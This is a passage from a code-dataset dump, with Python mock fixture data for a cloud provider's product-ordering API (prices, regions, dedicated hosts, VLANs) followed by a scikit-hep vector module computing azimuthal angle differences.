'id': 4439,
'keyName': 'KeyName017',
'capacity': '1',
'description': '1 GB iSCSI Storage',
'itemCategory': {'categoryCode': 'iscsi'},
'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 1121,
'keyName': 'KeyName081',
'capacity': '20',
'description': '20 GB iSCSI snapshot',
'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
},
{
'id': 4440,
'keyName': 'KeyName019',
'capacity': '4',
'description': '4 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 8880,
'keyName': 'KeyName0199',
'capacity': '8',
'description': '8 Portable Public IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 44400,
'keyName': 'KeyName0155',
'capacity': '4',
'description': '4 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{
'id': 88800,
'keyName': 'KeyName0144',
'capacity': '8',
'description': '8 Portable Private IP Addresses',
'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 10,
'keyName': 'KeyName0341',
'capacity': '0',
'description': 'Global IPv4',
'itemCategory': {'categoryCode': 'global_ipv4'},
'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
},
{
'id': 66464,
'keyName': '1_IPV6_ADDRESS',
'capacity': '64',
'description': '/64 Block Portable Public IPv6 Addresses',
'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
},
{
'id': 610,
'keyName': 'KeyName031',
'capacity': '0',
'description': 'Global IPv6',
'itemCategory': {'categoryCode': 'global_ipv6'},
'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
},
{'attributes': [],
'capacity': '0',
'description': '0 GB Bandwidth',
'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
'keyName': 'BANDWIDTH_0_GB_2',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 1800,
"locationGroupId": '',
'itemId': 439,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 99}]},
{'attributes': [],
'capacity': '10',
'description': '10 Mbps Public & Private Network Uplinks',
'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 272,
"locationGroupId": '',
'itemId': 186,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 5}]},
{'attributes': [],
'capacity': '0',
'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
'itemCategory': {'categoryCode': 'os', 'id': 12},
'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
'prices': [{'accountRestrictions': [],
'currentPriceFlag': '',
'hourlyRecurringFee': '0.10',
'id': 37650,
"locationGroupId": '',
'itemId': 4702,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0.1',
'setupFee': '0.1',
'sort': 9}],
'softwareDescription': {'id': 1362,
'longDescription': 'Ubuntu / 14.04-64',
'referenceCode': 'UBUNTU_14_64'}}
]
getItemPricesISCSI = [
{
'currentPriceFlag': '',
'id': 2152,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 46626,
'itemPriceId': 2152, 'packageId': 0}],
'quantity': '',
'recurringFee': '.35',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22501,
'item': {'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{
'id': 252983,
'itemPriceId': 22501, 'packageId': 0
}],
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0
},
{
'currentPriceFlag': '',
'id': 22441,
'item': {
'capacity': '1',
'description': '1 GB iSCSI SAN Storage',
'id': 1111,
'softwareDescriptionId': '',
'units': 'GB',
'upgradeItemId': 547
},
'itemId': 1111,
'laborFee': '0',
'onSaleFlag': '',
'oneTimeFee': '0',
'packageReferences': [{'id': 250326,
'itemPriceId': 22441, 'packageId': 0}],
'quantity': '',
'recurringFee': '15',
'setupFee': '0',
'sort': 0
}]
getItemsVS = [
{
'id': 1234,
'keyName': 'KeyName01',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'softwareDescription': {
'id': 1228,
'longDescription': 'Redhat EL 5.10-64',
'referenceCode': 'REDHAT_5_64'
},
'prices': [{'id': 1122,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 2233,
'keyName': 'KeyName02',
'capacity': '1000',
'description': 'Public & Private Networks',
'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
'prices': [{'id': 4477,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 26,
'name': 'Uplink Port Speeds',
'categoryCode': 'port_speed'}]}],
},
{
'id': 1239,
'keyName': 'KeyName03',
'capacity': '2',
'description': 'RAM',
'itemCategory': {'categoryCode': 'RAM'},
'prices': [{'id': 1133,
'hourlyRecurringFee': 0.0,
'recurringFee': 0.0,
'categories': [{'id': 3,
'name': 'RAM',
'categoryCode': 'ram'}]}],
}
]
verifyOrderDH = {
'preTaxSetup': '0',
'storageGroups': [],
'postTaxRecurring': '3.164',
'billingOrderItemId': '',
'presetId': '',
'hardware': [
{
'domain': 't.com',
'hostname': 't',
'bareMetalInstanceFlag': '',
'hardwareStatusId': '',
'primaryBackendNetworkComponent': {
'router': {
'id': 51218
},
'networkVlanId': ''
},
'accountId': ''
}
],
'prices': [
{
'itemId': 10195,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '3.164',
'oneTimeFee': '0',
'id': 200269,
'item': {
'thirdPartyPolicyAssignments': [],
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'bundle': [
{
'category': {
'categoryCode': 'dedicated_host_ram',
'id': 850,
'name': 'Dedicated Host RAM'
},
'itemPriceId': 200301,
'itemPrice': {
'itemId': 10199,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200301,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41763
},
{
'category': {
'categoryCode': 'dedicated_host_disk',
'id': 851,
'name': 'Dedicated Host Disk'
},
'itemPriceId': 200299,
'itemPrice': {
'itemId': 10197,
'setupFee': '0',
'recurringFee': '0',
'hourlyRecurringFee': '0',
'oneTimeFee': '0',
'id': 200299,
'laborFee': '0'
},
'bundleItemId': 10195,
'bundleItem': {
'units': 'CORE',
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'capacity': '56',
'description': '56 Cores X 242 RAM X 1.2 TB',
'id': 10195
},
'id': 41761
}
],
'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
'units': 'CORE',
'id': 10195
},
'laborFee': '0',
'categories': [
{
'categoryCode': 'dedicated_virtual_hosts',
'id': 848,
'name': 'Dedicated Host'
}
]
}
],
'sendQuoteEmailFlag': '',
'packageId': 813,
'useHourlyPricing': True,
'preTaxRecurringMonthly': '0',
'message': '',
'preTaxRecurring': '3.164',
'primaryDiskPartitionId': '',
'locationObject': {
'id': 138124,
'name': 'dal05',
'longName': 'Dallas 5'
},
'taxCompletedFlag': False,
'isManagedOrder': '',
'imageTemplateId': '',
'postTaxRecurringMonthly': '0',
'resourceGroupTemplateId': '',
'postTaxSetup': '0',
'sshKeys': [],
'location': '138124',
'stepId': '',
'proratedInitialCharge': '0',
'totalRecurringTax': '0',
'paymentType': '',
'resourceGroupId': '',
'sourceVirtualGuestId': '',
'bigDataOrderFlag': False,
'extendedHardwareTesting': '',
'preTaxRecurringHourly': '3.164',
'postTaxRecurringHourly': '3.164',
'currencyShortName': 'USD',
'containerSplHash': '000000003699c54000007f38ef8b0102',
'proratedOrderTotal': '0',
'serverCoreCount': '',
'privateCloudOrderFlag': False,
'totalSetupTax': '0',
'quantity': 1
}
itemsLoadbal = [
{
"capacity": "0",
"description": "Load Balancer as a Service",
"id": 10043,
"keyName": "LOAD_BALANCER_AS_A_SERVICE",
"itemCategory": {
"categoryCode": "load_balancer_as_a_service",
"id": 1116,
"name": "Load Balancer As A Service",
},
"prices": [
{
"hourlyRecurringFee": "0",
"id": 199447,
"locationGroupId": '',
"recurringFee": "0",
}
]
},
{
"capacity": "0",
"description": "Load Balancer Uptime",
"id": 10785,
"keyName": "LOAD_BALANCER_UPTIME",
"itemCategory": {
"categoryCode": "load_balancer_uptime",
"id": 1119,
"name": "Load Balancer Uptime",
},
"prices": [
{
"hourlyRecurringFee": ".028",
"id": 205913,
"locationGroupId": 507,
}]}
]
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01',
"groups": [
{
"description": "Location Group 4",
"id": 507,
"locationGroupTypeId": 82,
"name": "Location Group 4",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Cross Region - EU",
"id": 1303,
"locationGroupTypeId": 82,
"name": "eu",
"locationGroupType": {
"name": "PRICING"
}
},
{
"description": "COS Regional Frankfurt",
"id": 1783,
"locationGroupTypeId": 82,
"name": "eu-de",
"locationGroupType": {
"name": "PRICING"
}
}
]
}},
'sortOrder': 10}]
getAllObjectsLoadbal = [
{
"id": 805,
"keyName": "LBAAS",
"name": "Load Balancer As A Service (LBaaS)",
"items": itemsLoadbal,
"regions": regionsLoadbal
}
]
getAllObjectsDH = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores X 242 RAM X 1.2 TB",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "242_GB_RAM",
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_242_RAM_X_1_4_TB",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getAllObjectsDHGpu = [{
"subDescription": "Dedicated Host",
"name": "Dedicated Host",
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}],
"keyName": "DEDICATED_HOST",
"unitSize": "",
"regions": [{
"location": {
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 138124,
"packageId": 813
}],
"location": {
"statusId": 2,
"priceGroups": [{
"locationGroupTypeId": 82,
"description": "CDN - North America - Akamai",
"locationGroupType": {
"name": "PRICING"
},
"securityLevelId": "",
"id": 1463,
"name": "NORTH-AMERICA-AKAMAI"
}],
"id": 138124,
"name": "dal05",
"longName": "Dallas 5"
}
},
"keyname": "DALLAS05",
"description": "DAL05 - Dallas",
"sortOrder": 12
}],
"firstOrderStepId": "",
"id": 813,
"isActive": 1,
"description": "Dedicated Host"
}]
getRegions = [{
"description": "WDC07 - Washington, DC",
"keyname": "WASHINGTON07",
"location": {
"locationId": 2017603,
"location": {
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"priceGroups": [
{
"description": "COS Regional - US East",
"id": 1305,
"locationGroupTypeId": 82,
"name": "us-east",
"locationGroupType": {
"name": "PRICING"
}
}
]
}
},
"locations": [{
"location": {
"euCompliantFlag": False,
"id": 2017603,
"longName": "Washington 7",
"name": "wdc07",
"statusId": 2},
"locationPackageDetails": [{
"isAvailable": 1,
"locationId": 2017603,
"packageId": 46
}]
}]
}]
getItemPrices = [
{
"hourlyRecurringFee": ".093",
"id": 204015,
"recurringFee": "62",
"categories": [
{
"categoryCode": "guest_core"
}
],
"item": {
"description": "4 x 2.0 GHz or higher Cores",
"id": 859,
"keyName": "GUEST_CORES_4",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2,
"regions": [
{
"description": "MON01 - Montreal",
"keyname": "MONTREAL",
"sortOrder": 94
}
]
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2,
"regions": [
{
"description": "AMS02 POP - Amsterdam",
"keyname": "AMSTERDAM02",
"sortOrder": 12
}
]
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".006",
"id": 204663,
"recurringFee": "4.1",
"item": {
"description": "100 GB (LOCAL)",
"id": 3899,
"keyName": "GUEST_DISK_100_GB_LOCAL_3",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
},
{
"hourlyRecurringFee": ".217",
"id": 204255,
"recurringFee": "144",
"item": {
"description": "16 GB ",
"id": 1017,
"keyName": "RAM_16_GB",
},
"pricingLocationGroup": {
"id": 503,
"locations": [
{
"id": 449610,
"longName": "Montreal 1",
"name": "mon01",
"statusId": 2
},
{
"id": 449618,
"longName": "Montreal 2",
"name": "mon02",
"statusId": 2
},
{
"id": 448994,
"longName": "Toronto 1",
"name": "tor01",
"statusId": 2
},
{
"id": 350993,
"longName": "Toronto 2",
"name": "tor02",
"statusId": 2
},
{
"id": 221894,
"longName": "Amsterdam 2",
"name": "ams02",
"statusId": 2
},
{
"id": 265592,
"longName": "Amsterdam 1",
"name": "ams01",
"statusId": 2
},
{
"id": 814994,
"longName": "Amsterdam 3",
"name": "ams03",
"statusId": 2
}
]
}
}
]
getActivePresets = [
{
"description": "M1.64x512x25",
"id": 799,
"isActive": "1",
"keyName": "M1_64X512X25",
"name": "M1.64x512x25",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 258963,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
},
{
"description": "M1.56x448x100",
"id": 797,
"isActive": "1",
"keyName": "M1_56X448X100",
"name": "M1.56x448x100",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 698563,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
},
{
"description": "M1.64x512x100",
"id": 801,
"isActive": "1",
"keyName": "M1_64X512X100",
"name": "M1.64x512x100",
"packageId": 835,
"locations": [],
"prices": [
{
"hourlyRecurringFee": "0",
"id": 963258,
"itemId": 8195,
"recurringFee": "0",
"setupFee": "0"
}]
}
]
getAccountRestrictedActivePresets = []
RESERVED_CAPACITY = [{"id": 1059}]
getItems_RESERVED_CAPACITY = [
{
'id': 12273,
'keyName': 'B1_1X2_1_YEAR_TERM',
'description': 'B1 1x2 1 year term',
'capacity': 12,
'itemCategory': {
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '.032',
'id': 217561,
'itemId': 12273,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'reserved_capacity',
'id': 2060,
'name': 'Reserved Capacity',
'quantityLimit': 20,
'sortOrder': ''
}
]
}
]
}
]
getItems_1_IPV6_ADDRESS = [
{
'id': 4097,
'keyName': '1_IPV6_ADDRESS',
'itemCategory': {
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
},
'prices': [
{
'currentPriceFlag': '',
'hourlyRecurringFee': '0',
'id': 17129,
'itemId': 4097,
'laborFee': '0',
'locationGroupId': '',
'onSaleFlag': '',
'oneTimeFee': '0',
'quantity': '',
'recurringFee': '0',
'setupFee': '0',
'sort': 0,
'tierMinimumThreshold': '',
'categories': [
{
'categoryCode': 'pri_ipv6_addresses',
'id': 325,
'name': 'Primary IPv6 Addresses',
'quantityLimit': 0,
'sortOrder': 34
}
]
}
]
}
]
getObject = {
'id': 200,
'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
'keyname': 'WASHINGTON_DC',
'location': {'location': {'id': 37473,
'longName': 'Washington 1',
'name': 'wdc01'}},
'sortOrder': 10}],
'accountRestrictedActivePresets': [],
'activePresets': [
{
'description': 'AC2.8x60x25',
'id': 861,
'isActive': '1',
'keyName': 'AC2_8X60X25',
'name': 'AC2.8x60x25',
'packageId': 835
},
{
'description': 'AC2.8x60x100',
'id': 863,
'isActive': '1',
'keyName': 'AC2_8X60X100',
'name': 'AC2.8x60x100',
'packageId': 835
}],
"items": [{
"capacity": "56",
"description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
"bundleItems": [
{
"capacity": "1200",
"keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
"categories": [{
"categoryCode": "dedicated_host_disk"
}]
},
{
"capacity": "242",
"keyName": "2_GPU_P100_DEDICATED",
"hardwareGenericComponentModel": {
"capacity": "16",
"id": 849,
"hardwareComponentType": {
"id": 20,
"keyName": "GPU"
}
},
"categories": [{
"categoryCode": "dedicated_host_ram"
}, {
"capacity": "2",
"description": "2 x 2.0 GHz or higher Cores",
"keyName": "GUEST_CORES_2",
"attributes": [
{
"id": 8261,
"attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
}
],
"itemCategory": {
"categoryCode": "guest_core",
"id": 80
}}]
}
],
"prices": [
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2099",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.164",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200269,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": "",
"quantity": ""
},
{
"itemId": 10195,
"setupFee": "0",
"recurringFee": "2161.97",
"tierMinimumThreshold": "",
"hourlyRecurringFee": "3.258",
"oneTimeFee": "0",
"currentPriceFlag": "",
"id": 200271,
"sort": 0,
"onSaleFlag": "",
"laborFee": "0",
"locationGroupId": 503,
"quantity": ""
}
],
"keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
"id": 10195,
"itemCategory": {
"categoryCode": "dedicated_virtual_hosts"
}
}]}
getItems_vmware = [{
"capacity": "2",
"description": "VMware vSAN Enterprise Tier III 65 - 124 TB 6.x",
"id": 9567,
"itemTaxCategoryId": 166,
"keyName": "VMWARE_VSAN_ENTERPRISE_TIER_III_65_124_TB_6_X_2",
"softwareDescriptionId": 1979,
"units": "CPU",
"itemCategory": {
"categoryCode": "software_license",
"id": 438,
"name": "Software License",
"quantityLimit": 1,
},
"prices": [
{
"id": 245164,
"itemId": 9567,
"laborFee": "0",
"locationGroupId": None,
"recurringFee": "0",
"setupFee": "0",
"sort": 0,
}
]}]
getItemsVLAN = [{
"description": "Private Network Vlan",
"id": 1072,
"itemTaxCategoryId": 166,
"keyName": "PRIVATE_NETWORK_VLAN",
"itemCategory": {
"categoryCode": "network_vlan",
"id": 113,
"name": "Network Vlan"},
"prices": [{
"id": 203707,
"itemId": 1072,
"laborFee": "0",
"locationGroupId": 505,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
},
{
"id": 203727,
"itemId": 1072,
"laborFee": "0",
"locationGroupId": 545,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
}]
}, {
"description": "Public Network Vlan",
"id": 1071,
"itemTaxCategoryId": 166,
"keyName": "PUBLIC_NETWORK_VLAN",
"units": "N/A",
"itemCategory": {
"categoryCode": "network_vlan",
"id": 113,
"name": "Network Vlan",
},
"prices": [{
"id": 203637,
"itemId": 1071,
"laborFee": "0",
"locationGroupId": 509,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
},
{
"id": 203667,
"itemId": 1071,
"laborFee": "0",
"locationGroupId": 545,
"oneTimeFee": "0",
"recurringFee": "0",
"setupFee": "0",
"sort": 10,
}]
}
]
| 33.0115 | 106 | 0.376496 |
70925828c12988cf7da84052c16ee31871c4d5d7 | 1,497 | py | Python | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | src/vector/compute/planar/deltaphi.py | ianna/vector | c00b258049c0ea1de46f90311849923b96068a02 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2021, Jonas Eschle, Jim Pivarski, Eduardo Rodrigues, and Henry Schreiner.
#
# Distributed under the 3-clause BSD license, see accompanying file LICENSE
# or https://github.com/scikit-hep/vector for details.
import numpy
from vector.compute.planar import phi
from vector.methods import (
AzimuthalRhoPhi,
AzimuthalXY,
_aztype,
_from_signature,
_handler,
_lib_of,
)
def rectify(lib, phi):
return (phi + lib.pi) % (2 * lib.pi) - lib.pi
def xy_xy(lib, x1, y1, x2, y2):
return rectify(lib, phi.xy(lib, x1, y1) - phi.xy(lib, x2, y2))
def xy_rhophi(lib, x1, y1, rho2, phi2):
return rectify(lib, phi.xy(lib, x1, y1) - phi2)
def rhophi_xy(lib, rho1, phi1, x2, y2):
return rectify(lib, phi1 - phi.xy(lib, x2, y2))
def rhophi_rhophi(lib, rho1, phi1, rho2, phi2):
return rectify(lib, phi1 - phi2)
dispatch_map = {
(AzimuthalXY, AzimuthalXY): (xy_xy, float),
(AzimuthalXY, AzimuthalRhoPhi): (xy_rhophi, float),
(AzimuthalRhoPhi, AzimuthalXY): (rhophi_xy, float),
(AzimuthalRhoPhi, AzimuthalRhoPhi): (rhophi_rhophi, float),
}
def dispatch(v1, v2):
function, *returns = _from_signature(
__name__,
dispatch_map,
(
_aztype(v1),
_aztype(v2),
),
)
with numpy.errstate(all="ignore"):
return _handler((v1, v2))._wrap_result(
function(_lib_of((v1, v2)), *v1.azimuthal.elements, *v2.azimuthal.elements),
returns,
)
| 24.540984 | 94 | 0.639279 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.